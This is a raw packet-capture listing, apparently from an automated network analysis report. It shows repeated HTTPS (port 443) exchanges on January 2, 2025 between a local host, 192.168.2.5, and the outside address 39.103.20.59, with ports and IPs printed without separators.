                    Jan 2, 2025 12:08:39.600781918 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.600840092 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.604696989 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.604773998 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.606688976 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.606746912 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.608752012 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.608808041 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.612756014 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.612812996 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.614748955 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.614809036 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.618705034 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.618757010 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.620712996 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.620764017 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.622695923 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.622752905 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.626737118 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.626806021 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.628784895 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.628840923 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.632697105 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.632774115 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.634670019 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.634743929 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.638807058 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.638870001 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.640647888 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.640711069 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.642541885 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.642600060 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.646399975 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.646461010 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.648149967 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.648197889 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.651838064 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.651891947 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.653731108 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.653779030 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.655529976 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.655586958 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.659095049 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.659151077 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.660782099 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.660842896 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.664328098 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.664383888 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.666002989 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.666055918 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.667700052 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.667815924 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.671518087 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.671571016 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.673557997 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.673614025 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.677671909 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.677726984 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.679502010 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.679565907 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.683470011 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.683523893 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.683523893 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.683540106 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.683573961 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.683587074 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.687604904 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.687659025 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.687777996 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.687839985 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.691525936 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.691576958 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.697594881 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.697668076 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.697707891 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.697792053 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.701674938 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.701731920 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.701780081 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.701837063 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.707490921 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.707539082 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.707695007 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.707756042 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.781753063 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.781846046 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.782737970 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.782799959 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.784985065 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.785075903 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.789273977 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.789326906 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.791565895 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.791615009 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.801791906 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.801847935 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.812498093 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.812572002 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.814385891 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.814471006 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.814569950 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.814639091 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.814845085 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.814897060 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.815146923 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.815191031 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.815201998 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.815216064 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.815238953 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.815254927 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.819396019 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.819451094 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.824304104 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.824415922 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.824453115 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.824506998 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.828891993 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.828944921 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.833599091 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.833653927 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.839406967 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.839456081 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.840661049 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.840714931 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.843055010 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.843111992 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.847577095 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.847629070 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.847631931 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.847642899 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.847677946 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.847702980 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.852277040 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.852333069 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.852457047 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.852530956 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.856929064 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.856985092 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.859954119 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.860012054 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.860047102 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.860091925 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.860136032 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.860187054 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.860296011 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.860348940 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.860402107 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.860450029 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.860543966 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.860589027 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.860678911 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.860733986 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.868614912 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.868676901 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.868777990 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.868901014 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.871782064 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.871870041 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.871901035 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.871951103 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.878458023 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.878561020 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.878561020 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.878572941 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.878614902 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.878634930 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.899554014 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.899615049 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.899619102 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.899631977 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.899661064 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.899677038 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.901222944 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.901279926 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.901437998 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.901493073 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.901833057 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.901885986 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.901892900 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.901901007 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.901941061 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.903917074 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.903969049 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.904055119 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.904103994 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.911154985 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.911209106 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.911218882 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.911333084 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.920438051 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.920491934 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.920624971 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.920679092 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.927566051 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.927628040 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.927719116 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.927768946 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.934525967 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.934580088 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.934711933 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.934775114 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.939348936 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.939398050 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.939400911 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.939410925 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.939449072 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.943789005 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.943837881 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.943913937 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.943962097 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.946780920 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.946827888 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.946969032 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.947016001 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.947149038 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.947191954 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.947300911 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.947345018 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.947432995 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.947480917 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.947546005 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.947597980 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.960850000 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.960918903 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.960933924 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.960985899 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.961067915 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.961180925 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.961225033 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.961273909 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.965312004 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.965396881 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.965482950 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.965558052 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.986196995 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.986258030 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.986428976 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.986484051 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.988040924 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.988104105 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.988219023 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.988295078 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.988611937 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.988666058 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.988687038 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.988739967 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.990606070 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.990664005 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:39.990869999 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:39.990926981 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.001972914 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.002028942 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.002163887 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.002221107 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.007363081 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.007421970 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.007522106 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.007572889 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.014381886 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.014482021 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.014580011 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.014676094 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.021421909 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.021471977 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.021612883 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.021670103 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.026189089 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.026247025 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.026344061 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.026398897 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.030591011 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.030666113 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.030738115 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.030797958 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.033636093 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.033684969 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.033781052 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.033845901 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.034044981 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.034091949 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.034188986 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.034257889 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.034373999 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.034440041 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.034466028 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.034519911 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.047717094 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.047780991 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.047806025 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.047857046 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.047982931 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.048032999 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.048141003 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.048192978 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.052210093 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.052324057 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.052366018 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.052412033 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.076276064 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.076334000 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.076431990 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.076530933 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.076606035 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.076656103 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.076761007 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.076821089 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.076932907 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.076997995 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.077029943 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.077078104 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.077543020 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.077589035 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.077682972 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.077742100 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.088541985 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.088624954 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.088707924 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.088762045 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.094408035 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.094476938 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.094491005 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.094542980 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.101372004 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.101434946 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.101521015 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.101576090 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.108316898 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.108380079 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.108453035 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.108514071 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.113801003 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.113854885 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.114010096 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.114067078 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.117575884 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.117624044 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.117662907 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.117710114 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.120554924 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.120609045 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.120738029 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.120785952 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.120791912 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.120804071 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.120837927 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.120847940 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.120898008 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.120945930 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.121052027 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.121103048 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.121237040 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.121284008 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.134660959 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.134711981 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.134727955 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.134778976 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.134855986 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.134911060 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.135029078 CET4434997939.103.20.59192.168.2.5
                    Jan 2, 2025 12:08:40.135082006 CET49979443192.168.2.539.103.20.59
                    Jan 2, 2025 12:08:40.139193058 CET4434997939.103.20.59192.168.2.5
